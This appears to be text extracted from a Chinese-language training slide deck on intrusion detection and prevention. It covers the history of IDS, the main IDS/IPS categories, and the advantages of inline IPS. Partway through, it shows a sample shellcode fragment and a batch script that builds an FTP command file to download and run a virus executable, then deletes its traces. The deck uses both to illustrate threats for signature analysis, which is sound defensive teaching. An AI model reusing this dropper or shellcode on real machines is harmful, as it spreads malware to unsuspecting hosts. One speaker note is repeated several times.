入侵抵御技术交流.pptVIP

* * * * * * 从1984年到1986年，乔治敦大学的Dorothy Denning和SRI/CSL（SRI公司计算机科学实验室）的Peter Neumann研究出了一个实时入侵检测系统模型，取名为IDES（入侵检测专家系统）。该模型由六个部分组成：主体、对象、审计记录、轮廓特征、异常记录、活动规则。它独立于特定的系统平台、应用环境、系统弱点以及入侵类型，为构建入侵检测系统提供了一个通用的框架。  1990年是入侵检测系统发展史上的一个分水岭。这一年，加州大学戴维斯分校的L. T. Heberlein等人开发出了NSM（Network Security Monitor）。该系统第一次直接将网络流作为审计数据来源，因而可以在不将审计数据转换成统一格式的情况下监控异种主机。从此之后，入侵检测系统发展史翻开了新的一页，两大阵营正式形成：基于网络的IDS和基于主机的IDS。  重点讲解安全威胁的根源是由系统软件漏洞、应用程序漏洞造成的。与后面介绍的IPS特征库团队分析漏洞特征相对应。 重点讲解安全威胁的根源是由系统软件漏洞、应用程序漏洞造成的。与后面介绍的IPS特征库团队分析漏洞特征相对应。 重点讲解安全威胁的根源是由系统软件漏洞、应用程序漏洞造成的。与后面介绍的IPS特征库团队分析漏洞特征相对应。 重点讲解安全威胁的根源是由系统软件漏洞、应用程序漏洞造成的。与后面介绍的IPS特征库团队分析漏洞特征相对应。 重点讲解安全威胁的根源是由系统软件漏洞、应用程序漏洞造成的。与后面介绍的IPS特征库团队分析漏洞特征相对应。 重点讲解安全威胁的根源是由系统软件漏洞、应用程序漏洞造成的。与后面介绍的IPS特征库团队分析漏洞特征相对应。 重点讲解安全威胁的根源是由系统软件漏洞、应用程序漏洞造成的。与后面介绍的IPS特征库团队分析漏洞特征相对应。 重点讲解安全威胁的根源是由系统软件漏洞、应用程序漏洞造成的。与后面介绍的IPS特征库团队分析漏洞特征相对应。 * * * * * * * * * * * * * * * * * ShellCode： 90 00 90 00 90 00 90 00 eb 00 10 00 5a 00 4a 00 33 00 c9 00 66 00 b9 00 7d 00 01 00 80 00 34 00 0a 00 99 00 e2 00 fa 00 eb 00 05 00 e8 00 eb 00 ff 00 ff 00 ff echo off echo open 5554 cmd.ftp echo anonymouscmd.ftp echo userecho bincmd.ftp echo get 10281_up.execmd.ftp echo byecmd.ftp echo on ftp –s:cmd.ftp //这条命令上传病毒 10281_up.exe //这里执行病毒 echo off dell cmd.ftp //删除刚创建的批处理文件 echo on * * * * * * * IPS/IDS分类 IDS HIDS：主机型IDS，运行在主机上，对主机进行检测和报告可以行为 NIDS：网络型IDS，监听特定网络，检测并报告网络可疑行为 A{P}IDS：基于应用{协议}型IDS，如针对Web服务(HTTP/HTTPS的检测 IPS HIPS：主机型IPS，运行在主机上，对主机进行防护 NIPS：网络型IPS，接入特定网络，对该网络进行防护 CBIPS：基于内容IPS，检测网络数据包的内容并与特征库比较，以检测特定蠕虫或者攻击 RBIPS：基于速率的IPS，即针对DDoS攻击进行防护 IDS的问题：无法真正阻止攻击 防火墙通过80端口无法检测并阻止攻击 存在漏洞的服务器 防火墙 黑客通过80端口Web服务器进行攻击 服务器被攻破 IDS 产生报警并记录日志 与其他网络设备联动 无标准规范：与不同的厂家设备联动需要定制开发 无法有效抵御攻击 IDS的问题：部署需要其他网络设备配合 网络设备镜像引流 镜像口个数受具体网络设备能力限制，一个镜像口只能镜像1G流量 镜像影响网络设备的处理性能 采用TAP设备进行引流 需要额外的预算 增加了网络故障点 IPS的优势：在线部署，实时阻断攻击 路由器 交换机 IPS 内部网络 路由器 交换机 IDS 内部网络 镜像 IPS可以做到 在线部署，实施阻断攻击 实现细力度的响应，如重定向，隔离等 不依赖与其他网络设备 IPS的优势：确保检测精度 检测引擎技术 全面的协议识别 对于不同的攻击采用不同的检测方法，提高检测精度 集成式内容搜索引擎，报文一次匹配，多种内容输出 架构上 抛弃x86架构，对于检测引擎采用专有硬件 多重检测机制，确保检测精度 IPS